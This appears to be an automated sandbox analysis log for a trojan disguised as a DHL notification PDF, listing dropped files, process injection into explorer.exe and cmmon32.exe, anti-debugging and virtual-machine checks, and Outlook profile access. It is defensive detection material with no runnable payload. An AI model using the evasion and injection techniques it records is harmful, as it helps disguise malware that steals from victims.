Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00A59A00
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59A50 NtCreateFile,LdrInitializeThunk, 3_2_00A59A50
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A595D0 NtClose,LdrInitializeThunk, 3_2_00A595D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59540 NtReadFile,LdrInitializeThunk, 3_2_00A59540
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A596E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00A596E0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00A59660
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A597A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00A597A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00A59780
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00A59FE0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00A59710
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A598A0 NtWriteVirtualMemory, 3_2_00A598A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59820 NtEnumerateKey, 3_2_00A59820
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A5B040 NtSuspendThread, 3_2_00A5B040
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A599D0 NtCreateProcessEx, 3_2_00A599D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59950 NtQueueApcThread, 3_2_00A59950
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59A80 NtOpenDirectoryObject, 3_2_00A59A80
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59A10 NtQuerySection, 3_2_00A59A10
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A5A3B0 NtGetContextThread, 3_2_00A5A3B0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59B00 NtSetValueKey, 3_2_00A59B00
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A595F0 NtQueryInformationFile, 3_2_00A595F0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59520 NtWaitForSingleObject, 3_2_00A59520
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A5AD30 NtSetContextThread, 3_2_00A5AD30
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59560 NtWriteFile, 3_2_00A59560
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A596D0 NtCreateKey, 3_2_00A596D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59610 NtEnumerateValueKey, 3_2_00A59610
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59670 NtQueryInformationProcess, 3_2_00A59670
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59650 NtQueryValueKey, 3_2_00A59650
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59730 NtQueryVirtualMemory, 3_2_00A59730
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A5A710 NtOpenProcessToken, 3_2_00A5A710
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59760 NtOpenProcess, 3_2_00A59760
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59770 NtSetInformationFile, 3_2_00A59770
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A5A770 NtOpenThread, 3_2_00A5A770
Source: DHL_Notification_pdf.exe ReversingLabs: Detection: 53%
Source: DHL_Notification_pdf.exe Virustotal: Detection: 46%
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe File read: C:\Users\user\Desktop\DHL_Notification_pdf.exe
Source: DHL_Notification_pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\DHL_Notification_pdf.exe C:\Users\user\Desktop\DHL_Notification_pdf.exe
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process created: C:\Users\user\AppData\Local\Temp\ldndbi.exe "C:\Users\user~1\AppData\Local\Temp\ldndbi.exe" C:\Users\user~1\AppData\Local\Temp\qlqjt.de
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process created: C:\Users\user\AppData\Local\Temp\ldndbi.exe C:\Users\user~1\AppData\Local\Temp\ldndbi.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process created: C:\Users\user\AppData\Local\Temp\ldndbi.exe "C:\Users\user~1\AppData\Local\Temp\ldndbi.exe" C:\Users\user~1\AppData\Local\Temp\qlqjt.de
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process created: C:\Users\user\AppData\Local\Temp\ldndbi.exe C:\Users\user~1\AppData\Local\Temp\ldndbi.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe File created: C:\Users\user~1\AppData\Local\Temp\nsw10F4.tmp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/5@12/7
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404AB5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Command line argument: A 1_2_00410940
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\cmmon32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\cmmon32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: DHL_Notification_pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmmon32.pdb source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ldndbi.exe, 00000001.00000003.250768478.000000001A020000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000001.00000003.250473705.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ldndbi.exe, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Unpacked PE file: 3.2.ldndbi.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_00410AA4 push ecx; ret 1_2_00410AB7
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041B1FB push esi; iretd 3_2_0041B1FC
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0040DAA5 push edi; retf 3_2_0040DAAE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041B369 push es; retf 3_2_0041B3A3
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00422C58 push dword ptr [057DC0C6h]; ret 3_2_00422C7C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041C4AA push ecx; retf 3_2_0041C4AF
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041BDCE push esp; ret 3_2_0041BDCF
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401DF0 push eax; ret 3_2_00401DF2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00406F32 push C87026BFh; retf 3_2_00406F37
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A6D0D1 push ecx; ret 3_2_00A6D0E4
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe File created: C:\Users\user\AppData\Local\Temp\ldndbi.exe
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 3384 Thread sleep time: -38000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A46A60 rdtscp 3_2_00A46A60
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 877
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 870
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe API coverage: 9.3 %
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_004089F8 FindFirstFileExW, 1_2_004089F8
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000003.463061661.0000000007AFF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000002.517701971.0000000007B66000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.263500910.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1D
Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k
Source: explorer.exe, 00000004.00000000.259895150.0000000005EF4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: cmmon32.exe, 00000005.00000002.509147113.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`p
Source: cmmon32.exe, 00000005.00000002.509147113.0000000000F1D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.263500910.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}813
Source: explorer.exe, 00000004.00000002.522931488.000000000F5CA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.461873362.000000000F5CA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllate
Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: explorer.exe, 00000004.00000002.514828788.0000000005F12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040636B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_0040B0AF GetProcessHeap, 1_2_0040B0AF
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A46A60 rdtscp 3_2_00A46A60
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h] 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h] 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h] 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h] 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h] 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h] 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A590AF mov eax, dword ptr fs:[00000030h] 3_2_00A590AF
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4F0BF mov ecx, dword ptr fs:[00000030h] 3_2_00A4F0BF
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A4F0BF
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A4F0BF
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19080 mov eax, dword ptr fs:[00000030h] 3_2_00A19080
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A93884 mov eax, dword ptr fs:[00000030h] 3_2_00A93884
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A93884 mov eax, dword ptr fs:[00000030h] 3_2_00A93884
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A158EC mov eax, dword ptr fs:[00000030h] 3_2_00A158EC
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00AAB8D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAB8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00AAB8D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00AAB8D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00AAB8D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00AAB8D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00AAB8D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h] 3_2_00A2B02A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h] 3_2_00A2B02A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h] 3_2_00A2B02A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h] 3_2_00A2B02A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h] 3_2_00A4002D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h] 3_2_00A4002D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h] 3_2_00A4002D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h] 3_2_00A4002D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h] 3_2_00A4002D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE4015 mov eax, dword ptr fs:[00000030h] 3_2_00AE4015
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE4015 mov eax, dword ptr fs:[00000030h] 3_2_00AE4015
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A97016 mov eax, dword ptr fs:[00000030h] 3_2_00A97016
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A97016 mov eax, dword ptr fs:[00000030h] 3_2_00A97016
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A97016 mov eax, dword ptr fs:[00000030h] 3_2_00A97016
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE1074 mov eax, dword ptr fs:[00000030h] 3_2_00AE1074
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD2073 mov eax, dword ptr fs:[00000030h] 3_2_00AD2073
